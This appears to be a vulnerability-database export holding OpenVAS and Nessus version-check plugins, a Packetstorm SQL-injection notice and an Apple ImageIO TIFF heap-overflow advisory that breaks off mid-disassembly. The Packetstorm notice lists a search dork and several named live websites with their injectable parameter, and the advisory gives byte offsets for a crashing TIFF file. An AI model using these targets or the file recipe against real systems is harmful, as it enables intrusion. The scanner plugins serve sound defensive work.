"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_symantec_workspace_streaming_info_disc_vuln.nasl 12455 2018-11-21 09:17:27Z cfischer $\n#\n# Symantec Workspace Streaming Information Disclosure Vulnerability\n#\n# Authors:\n# Tushar Khelge <tushar.khelge@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:workspace_streaming\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808586\");\n script_version(\"$Revision: 12455 $\");\n script_cve_id(\"CVE-2014-1649\");\n script_bugtraq_id(67189);\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 10:17:27 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-18 17:09:19 +0530 (Mon, 18 Jul 2016)\");\n script_name(\"Symantec Workspace Streaming Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Symantec\n Symantec Workspace Streaming and is prone to an information disclosure\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to symantec workspace\n streaming server does not properly handle incoming HTTPS XMLRPC requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote\n attackers to execute arbitrary code on the server and create an unauthorized\n access point on the server.\");\n\n script_tag(name:\"affected\", value:\"Symantec Workspace Streaming before 7.5.0.749.\");\n\n script_tag(name:\"solution\", value:\"Update Symantec Workspace Streaming version 7.5.0.749\n and later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-14-127\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_workspace_streaming_detect.nasl\");\n script_mandatory_keys(\"Symantec/Workspace/Streaming/Agent/Win6432/Installed\");\n script_xref(name:\"URL\", value:\"https://support.symantec.com/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!sepVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:sepVer, test_version:\"7.5.0.749\"))\n{\n report = report_fixed_ver(installed_version:sepVer, fixed_version:\"7.5.0.749\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:39:30", "bulletinFamily": "scanner", "description": "The host is installed with K7 Total\n Security and is prone to privilege escalation vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310805454", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805454", "title": "K7 Total Security Privilege Escalation Vulnerability Feb15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_k7_total_security_privilege_escalation_vuln_feb15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# K7 Total Security Privilege Escalation Vulnerability Feb15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:k7computing:total_security\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805454\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-9643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 17:11:51 +0530 (Tue, 27 Jan 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"K7 Total Security Privilege Escalation Vulnerability Feb15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with K7 Total\n Security and is prone to privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a write-what-where flaw\n in K7Sentry.sys in K7 Computing products that is triggered when handling\n certain IOCTL calls.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a local\n attacker to write controlled data to any memory location and execute code with\n kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"K7 Total Security before 14.2.0.253\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to K7 Total Security version\n 14.2.0.253 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35992/\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130246/\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_k7_total_security_detect_win.nasl\");\n script_mandatory_keys(\"K7/TotalSecurity6432/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://www.k7computing.co.uk/\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!k7usecVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:k7usecVer, test_version:\"14.2.0.253\"))\n{\n report = 'Installed version: ' + k7usecVer + '\\n' +\n 'Fixed version: ' + \"14.2.0.253\" + '\\n';\n security_message(data:report );\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-15T12:56:21", "bulletinFamily": "scanner", "description": "This host is installed with Python and is prone to buffer overflow\n vulnerability.", "modified": "2018-11-15T00:00:00", "published": "2014-03-05T00:00:00", "id": "OPENVAS:1361412562310804322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804322", "title": "Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_python_bof_vuln_mar14_win.nasl 12358 2018-11-15 07:57:20Z cfischer $\n#\n# Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:python:python\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804322\");\n script_version(\"$Revision: 12358 $\");\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 08:57:20 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-05 12:18:28 +0530 (Wed, 05 Mar 2014)\");\n script_name(\"Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_python_detect_win.nasl\");\n script_mandatory_keys(\"python6432/win/detected\");\n\n script_xref(name:\"URL\", value:\"http://bugs.python.org/issue20246\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56624\");\n script_xref(name:\"URL\", value:\"http://pastebin.com/raw.php?i=GHXSmNEg\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31875\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1029831\");\n script_xref(name:\"URL\", value:\"http://www.python.org/download/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Python and is prone to buffer overflow\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to a boundary error within the 'sock_recvfrom_into' function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to cause a buffer\n overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Python version 2.5 before 2.7.7 and 3.x before 3.3.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Python version 2.7.7, 3.3.4 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npyVer = infos['version'];\npypath = infos['location'];\n\nif(version_in_range(version:pyVer, test_version:\"2.5\", test_version2:\"2.7.6150\")||\n version_in_range(version:pyVer, test_version:\"3.0\", test_version2:\"3.3.3150\")){\n report = report_fixed_ver(installed_version:pyVer, fixed_version:\"2.7.7/3.3.4\", install_path:pypath);\n security_message(data:report);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:26:03", "bulletinFamily": "scanner", "description": "The remote FreeSWITCH server is prior to version 1.4.26 or 1.6.x prior to 1.6.5. It is, therefore, affected by a remote code execution vulnerability due to improper validation of user-supplied input to the parse_string() function in esl_json.c, switch_json.c, and ks_json.c. A remote attacker can exploit this, via a crafted JSON message, to cause a heap-based buffer overflow condition, resulting in a denial of service or the execution of arbitrary code.", "modified": "2018-07-11T00:00:00", "id": "FREESWITCH_FS8160.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=88696", "published": "2016-02-11T00:00:00", "title": "FreeSWITCH < 1.4.26 / 1.6.x < 1.6.5 JSON Parser RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88696);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2015-7392\", \"CVE-2015-8311\");\n script_bugtraq_id(76976);\n script_xref(name:\"TRA\", value:\"TRA-2015-05\");\n\n script_name(english:\"FreeSWITCH < 1.4.26 / 1.6.x < 1.6.5 JSON Parser RCE\");\n script_summary(english:\"Checks the version of FreeSWITCH.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeSWITCH server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FreeSWITCH server is prior to version 1.4.26 or 1.6.x prior\nto 1.6.5. It is, therefore, affected by a remote code execution\nvulnerability due to improper validation of user-supplied input to the\nparse_string() function in esl_json.c, switch_json.c, and ks_json.c. A\nremote attacker can exploit this, via a crafted JSON message, to cause\na heap-based buffer overflow condition, resulting in a denial of\nservice or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://freeswitch.org/jira/browse/FS-8160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2015-05\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FreeSWITCH version 1.4.26 / 1.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:freeswitch:freeswitch\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"freeswitch_detection.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"sip/freeswitch/present\");\n script_require_ports(\"Services/udp/sip\", \"Services/sip\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"FreeSWITCH\";\nget_kb_item_or_exit(\"sip/freeswitch/present\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nerrors = make_list();\nudp_ports = get_kb_list(\"Services/udp/sip\");\ntcp_ports = get_kb_list(\"Services/sip\");\nif (isnull(tcp_ports) && isnull(udp_ports)) audit(AUDIT_NOT_INST, appname);\n\nfunction is_vulnerable(version, commit, proto, port)\n{\n local_var report = '';\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to determine the FreeSWITCH version on \" + proto + \"/\" + port + \".\");\n return FALSE;\n }\n\n # the fix was pushed out in 1.6.5\n if (ver_compare(ver:version, fix:\"1.6.5\", strict:FALSE) < 0)\n {\n # freeswitch now maintains a 1.6 branch and a 1.4 branch. Determine\n # if we are looking at a 1.4 line\n if (ver_compare(ver:version, fix:\"1.5\", strict:FALSE) < 0)\n {\n if (ver_compare(ver:version, fix:\"1.4.26\", strict:FALSE) < 0)\n {\n report = \n '\\n Installed version : ' + version + \n '\\n Fixed version : 1.4.26\\n';\n }\n }\n else\n {\n report = \n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.6.5\\n';\n }\n }\n\n if (report != '')\n {\n if (report_verbosity > 0) security_hole(extra:report, port:port, proto:proto);\n else security_hole(port:port, proto:proto);\n return TRUE;\n }\n return FALSE;\n}\n\nis_vuln = FALSE;\nif (!isnull(tcp_ports))\n{\n foreach port (make_list(tcp_ports))\n {\n version = get_kb_item(\"sip/freeswitch/tcp/\" + port + \"/version\");\n if (!version) continue;\n if (!isnull(version) && is_vulnerable(version:version, proto:\"tcp\", port:port)) is_vuln = TRUE;\n }\n}\nif (!isnull(udp_ports))\n{\n foreach port (make_list(udp_ports))\n {\n version = get_kb_item(\"sip/freeswitch/udp/\" + port + \"/version\");\n if (!version) continue;\n if (!isnull(version) && is_vulnerable(version:version, proto:\"udp\", port:port)) is_vuln = TRUE;\n }\n}\n\nif (max_index(errors))\n{\n errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n exit(1, errmsg);\n} else if(!is_vuln) audit(AUDIT_INST_VER_NOT_VULN, appname);\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-11-03T10:19:36", "bulletinFamily": "exploit", "description": "", "modified": "2012-03-11T00:00:00", "published": "2012-03-11T00:00:00", "href": "https://packetstormsecurity.com/files/110665/SRISMS-SQL-Injection.html", "id": "PACKETSTORM:110665", "type": "packetstorm", "title": "SRISMS SQL Injection", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Official Website: http://www.1337day.com 0 \n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1 \n0 0 \n1 ########################################## 1 \n0 I'm NuxbieCyber Member From Inj3ct0r Team 1 \n1 ########################################## 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n[ SRISMS - SQL Injection Vulnerability ] \n \n[x] Author : the_cyber_nuxbie \n[x] Home : www.thecybernuxbie.com \n[x] E-mail : staff@thecybernuxbie.com \n[x] Found : 10 March 2012 @ 08:25 PM. \n[x] Tested : Back|Track 5. \n[x] Dork : inurl:\"/searchviewdetails.php?id=\" \n________________________________________________________________________ \n************************************************************************ \n \n- Info WebApps: \nThis Content WebApps Develop By: http://www.srisms.com/webdesigning.html \n \n- Exploit Report: \nhttp://localhost/WebApps/searchviewdetails.php?id=[SQL Injection] \n \n- Sample WebApps Vuln SQLi: \nhttp://gayatrivivahakendram.com/searchviewdetails.php?id=730' + [SQL Injection] \nhttp://agtsangham.com/searchviewdetails.php?id=400' + [SQL Injection] \nhttp://kapumarriagelinks.com/searchviewdetails.php?id=280' + [SQL Injection] \nhttp://visakhamarriagelines.com/searchviewdetails.php?id=8160' + [SQL Injection] \nhttp://kyathimarriages.com/searchviewdetails.php?id=780' + [SQL Injection] \nhttp://ssmarriagelinks.com/searchviewdetails.php?id=358' + [SQL Injection] \nhttp://srisimhadrimarriagelinks.com/searchviewdetails.php?id=568' + [SQL Injection] \n \n0day no more... \n\"n0 d0rk f0r k1dd10ts\" \n \n- Curahan Hati: \nI want to school college level... \n(the biggest obsession = S1 - TI) \nBut I do not have a cost... \nHelp Me...!!! \n \n- Greetz: \n*** 1337day Inject0r TEAM *** \n...:::' All Member & Staff Inject0r TEAM ':::... \n \n- Greetz To All Exploiters From Indonesian: \n[ Member Of Inj3ct0r & Exploit-DB ] \nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel, \neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t, \nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, \nNTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death, \nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... \n \n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\" \n \nMe @ March, 10 2012, GMT +08:25 Solo Raya, Indonesian. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/110665/srisms-sql.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "=======\r\nSummary\r\n=======\r\nName: Apple OSX / iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow \r\nReference: NGS00062\r\nDiscoverer: Dominic Chell <dominic.chell@ngssecure.com>\r\nVendor: Apple\r\nVendor Reference: 145575681\r\nSystems Affected: Apple OSX / iPhone iOS / Possibly others using LibTiff\r\nRisk: High\r\nStatus: Fixed\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 27 February 2011\r\nReleased: 27 February 2011\r\nApproved: 29 March 2011\r\nReported: 29 March 2011\r\nFixed: 23 June 2011\r\nPublished: 10 October 2011\r\n\r\n===========\r\nDescription\r\n===========\r\nHeap overflow caused by overly large tilewidth image tag in getBandProcTiff()\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nThe Offset 8BE6 is changed from 17 to 42. This field is the tiff tag StripByteCounts. Valid value is 1701 which signifies the StripByteCounts tiff tag Flipping the stripbytescount field to 4201 causes the \r\n\r\nstripbytescount tag to be removed for the first page in the tiff image and be replaced with the tilewidth image tag. The definition of this image tag can be found here:\r\nhttp://www.awaresystems.be/imaging/tiff/tifftags/tilewidth.html\r\n\r\nThe value for the tilewidth tag is read from 8BEE to 8BF1 inclusive. Setting the tilewidth to 00800000 (8388608) causes the following crash:\r\n\r\nProgram received signal EXC_BAD_ACCESS, Could not access memory.\r\nReason: KERN_INVALID_ADDRESS at address: 0x00000001007ca000\r\n[Switching to process 2342]\r\n0x00007fffffe00847 in __memcpy ()\r\n(gdb) i r\r\nrax 0xffffffffeb790000 -344391680\r\nrbx 0x10078c000 4302880768\r\nrcx 0xfffffffffff3e000 -794624\r\nrdx 0x0 0\r\nrsi 0x1150fc000 4648321024\r\nrdi 0x10088c000 4303929344\r\nrbp 0x102ed7790 0x102ed7790\r\nrsp 0x102ed7790 0x102ed7790\r\nr8 0x15dafbfff 5866766335\r\nr9 0x7 7\r\nr10 0x10340ddf0 4349550064\r\nr11 0x10078c000 4302880768\r\nr12 0x1 1\r\nr13 0x100000 1048576\r\nr14 0x0 0\r\nr15 0x0 0\r\nrip 0x7fffffe00847 0x7fffffe00847 <__memcpy+167>\r\neflags 0x10286 66182\r\ncs 0x27 39\r\nss 0x0 0\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/i $rip\r\n0x7fffffe00847 <__memcpy+167>: movdqa XMMWORD PTR [rdi+rcx],xmm0\r\n(gdb)\r\n\r\nReducing the tilewidth to 0000FF00 or 65280 we get a different crash:\r\n\r\nProgram received signal EXC_BAD_ACCESS, Could not access memory.\r\nReason: KERN_INVALID_ADDRESS at address: 0x00000001007c7000\r\n[Switching to process 2379]\r\n0x00007fffffe007c5 in __memcpy ()\r\n(gdb) i r\r\nrax 0xffffffff 4294967295\r\nrbx 0x1007c5030 4303114288\r\nrcx 0x4 4\r\nrdx 0x20 32\r\nrsi 0x1159c4194 4657529236\r\nrdi 0x1007c7000 4303122432\r\nrbp 0x10067d790 0x10067d790\r\nrsp 0x10067d790 0x10067d790\r\nr8 0x1159f3e9f 4657725087\r\nr9 0x7 7\r\nr10 0x100122cc0 4296158400\r\nr11 0x1007c5030 4303114288\r\nr12 0x473 1139\r\nr13 0x1fe0 8160\r\nr14 0x0 0\r\nr15 0x0 0\r\nrip 0x7fffffe007c5 0x7fffffe007c5 <__memcpy+37>\r\neflags 0x10202 66050\r\ncs 0x27 39\r\nss 0x0 0\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/i $rip\r\n0x7fffffe007c5 <__memcpy+37>: mov DWORD PTR [rdi],eax\r\n(gdb)\r\n(gdb) bt\r\n#0 0x00007fffffe007c5 in __memcpy ()\r\n#1 0x00007fff80f766ef in getBandProcTIFF ()\r\n\r\nDisassembly of function: \r\nBreakpoint here:\r\n\r\n0x00007fff80f765a4 <getBandProcTIFF+284>: call 0x7fff8104cade<dyld_stub__cg_TIFFGetField>\r\n\r\nFunction reads the value of the TileWidth, arguments:\r\n\r\nrsi 0x142 322\r\n\r\nesi contains the tiff image tag for tile width that this function extracts the value for, in this instance its 322 which is TileWidth.\r\n\r\n0x00007fff80f765a9 <getBandProcTIFF+289>: lea rdx,[rbp-0x38]\r\n0x00007fff80f765ad <getBandProcTIFF+293>: mov rax,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f765b4 <getBandProcTIFF+300>: mov rdi,QWORD PTR [rax+0x38]\r\n0x00007fff80f765b8 <getBandProcTIFF+304>: mov esi,0x143\r\n0x00007fff80f765bd <getBandProcTIFF+309>: xor eax,eax\r\n0x00007fff80f765bf <getBandProcTIFF+311>: call 0x7fff8104cade<dyld_stub__cg_TIFFGetField>// read tilelength field\r\n0x00007fff80f765c4 <getBandProcTIFF+316>: mov edx,DWORD PTR [rbp-0x38]\r\n0x00007fff80f765c7 <getBandProcTIFF+319>: mov rax,rbx\r\n0x00007fff80f765ca <getBandProcTIFF+322>: mov rcx,rdx\r\n0x00007fff80f765cd <getBandProcTIFF+325>: xor edx,edx\r\n0x00007fff80f765cf <getBandProcTIFF+327>: div rcx\r\n0x00007fff80f765d2 <getBandProcTIFF+330>: mov QWORD PTR [rbp-0x510],rax\r\n0x00007fff80f765d9 <getBandProcTIFF+337>: xor r14d,r14d\r\n0x00007fff80f765dc <getBandProcTIFF+340>: jmp 0x7fff80f76720<getBandProcTIFF+664>\r\n0x00007fff80f765e1 <getBandProcTIFF+345>: mov rbx,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f765e8 <getBandProcTIFF+352>: mov rdx,QWORD PTR [rbx+0x8]\r\n0x00007fff80f765ec <getBandProcTIFF+356>: lea rax,[r14+0x1]\r\n0x00007fff80f765f0 <getBandProcTIFF+360>: mov QWORD PTR [rbp-0x468],rax\r\n0x00007fff80f765f7 <getBandProcTIFF+367>: imul rax,rdx\r\n0x00007fff80f765fb <getBandProcTIFF+371>: mov QWORD PTR [rbp-0x4b0],rdx\r\n0x00007fff80f76602 <getBandProcTIFF+378>: cmp QWORD PTR [rbp-0x4e8],rax\r\n0x00007fff80f76609 <getBandProcTIFF+385>: jae 0x7fff80f76623<getBandProcTIFF+411>\r\n0x00007fff80f7660b <getBandProcTIFF+387>: mov rax,r14\r\n0x00007fff80f7660e <getBandProcTIFF+390>: imul rax,rdx\r\n0x00007fff80f76612 <getBandProcTIFF+394>: mov rcx,QWORD PTR [rbp-0x4e8]\r\n0x00007fff80f76619 <getBandProcTIFF+401>: sub rcx,rax\r\n0x00007fff80f7661c <getBandProcTIFF+404>: mov QWORD PTR [rbp-0x4b0],rcx\r\n0x00007fff80f76623 <getBandProcTIFF+411>: mov rax,QWORD PTR [rbp-0x4f0]\r\n0x00007fff80f7662a <getBandProcTIFF+418>: imul rax,rdx\r\n0x00007fff80f7662e <getBandProcTIFF+422>: imul rax,r14\r\n0x00007fff80f76632 <getBandProcTIFF+426>: add rax,QWORD PTR [rbp-0x4f8]\r\n0x00007fff80f76639 <getBandProcTIFF+433>: mov QWORD PTR [rbp-0x4b8],rax\r\n0x00007fff80f76640 <getBandProcTIFF+440>: xor r15d,r15d\r\n0x00007fff80f76643 <getBandProcTIFF+443>: jmp 0x7fff80f76709<getBandProcTIFF+641>\r\n0x00007fff80f76648 <getBandProcTIFF+448>: mov rcx,r14\r\n0x00007fff80f7664b <getBandProcTIFF+451>: mov rax,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f76652 <getBandProcTIFF+458>: imul rcx,QWORD PTR [rax+0x8]\r\n0x00007fff80f76657 <getBandProcTIFF+463>: mov rdi,QWORD PTR [rax+0x38]\r\n0x00007fff80f7665b <getBandProcTIFF+467>: xor r9d,r9d\r\n0x00007fff80f7665e <getBandProcTIFF+470>: xor r8d,r8d\r\n0x00007fff80f76661 <getBandProcTIFF+473>: mov edx,r15d\r\n0x00007fff80f76664 <getBandProcTIFF+476>: mov rsi,QWORD PTR [rbp-0x508]\r\n0x00007fff80f7666b <getBandProcTIFF+483>: call 0x7fff8104cb08<dyld_stub__cg_TIFFReadTile>\r\n0x00007fff80f76670 